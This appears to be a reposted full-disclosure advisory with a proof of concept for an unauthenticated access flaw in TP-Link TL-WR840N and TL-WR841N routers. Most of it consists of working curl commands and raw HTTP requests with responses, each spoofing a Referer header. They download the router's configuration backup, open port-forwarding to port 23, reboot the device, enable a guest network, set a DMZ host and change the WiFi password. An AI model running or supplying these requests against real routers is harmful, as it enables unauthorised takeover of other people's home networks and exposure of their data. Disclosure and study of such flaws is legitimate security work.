扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 |
Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated Router Access Vulnerability Author: BlackFog Team Date: 27 May 2018 Website: SecureLayer7.net Contact: info@securelayer7.net Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n Hardware: TL-WR841N v13 00000013 Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n Hardware Version: TL-WR840N v5 00000005 Vendor Description: TP-Link is the world's #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/) Attack Description : This issue is caused by improper session handling on /cgi/ Folder or /cgi file found by Touhid Shaikh(BlackFog Team Member). if any attacker sends Referer Header with its request and sets Referer: http://192.168.0.1/mainFrame.htm dan its no authentication required and an attacker can do router's action without authentication. below are some of few examples you can see. But the attacker can do mostly all of the action on a router without Authentication. NOTE:Except admin's password change bcz its required current password for changing ##### POC ###### ----------------------- Fail attempt ------------------------- root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html> ----------------------------------------------------- --------------- Seccessfull attempt -------------------------------- root@linux:/workspace# curl -i -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin HTTP/1.1 200 OK Content-Type: application/octet-stream; charset=utf-8 Content-Length: 5984 Connection: keep-alive root@linux:/workspace# curl -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin > backup.bin root@linux:/workspace# file backup.bin backup.bin: data root@linux:/workspace# ls -la backup.bin -rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin ---------------------------------------------------- ##### POC END ###### Evil Actions Without Authentication example. ============== Burp Request and curl command for conf.bin or backup file ================= ####### Burp ######## GET /cgi/conf.bin HTTP/1.1 Host: 192.168.0.1 User-Agent: Agent22 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/mainFrame.htm Connection: close Upgrade-Insecure-Requests: 1 -------Response-------- HTTP/1.1 200 OK Content-Type: application/octet-stream; charset=utf-8 Content-Length: 5720 Connection: close w@\ÝÓb êLýªïÀ‡ÉE‹ûaɬ,*-àh[Ú‹³lÙ€ÍÁ.©- .....SKIP....... 8/����W ######## Curl ########## curl -i -s -k-X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close'$' http://192.168.0.1/cgi/conf.bin' > backup.bin ------ take a look in backup.bin file -------- =========================================== =========== Add Port Forwarding ============ curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3 HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive [1,1,2,7,0,0]0 triggerPort=23 triggerProtocol=TCP or UDP openProtocol=TCP or UDP enable=1 openPort=23 [error]0 ----- Decription ----- enable=0 is for disable enable=1 is for enable u can change port also. ==================================== =========== Reboot Router ========================= curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7 HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive [error]0 ----Description ----- error = 0 means reboot seccessully ====================================== ============= Enable Guest Network ========================== curl -i -s -k-X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $'http://192.168.0.1/cgi?2&2&2&2&2' ------- Description ---------- SSID=Agent22 PreSharedKey=9876543210 ============================================= ======= DMZ enable and Disable on 192.168.0.112 =========== curl -i -s -k-X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' $'http://192.168.0.1/cgi?2' HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close [error]0 -------Description ----------- IPAddress=192.168.0.112 enable=1 or 0 (enable or disable) ================================================= =============== WiFi Password Change ============= curl -i -s -k-X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $'http://192.168.0.1/cgi?2' -------Description ----------- IEEE11iAuthenticationMode=PSKAuthentication IEEE11iEncryptionModes=AESEncryption X_TP_PreSharedKey=9876543210 =============================== ======= Report Timeline ============= 30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response) 27 May, 2018 ----- Full Disclosure |
体验盒子
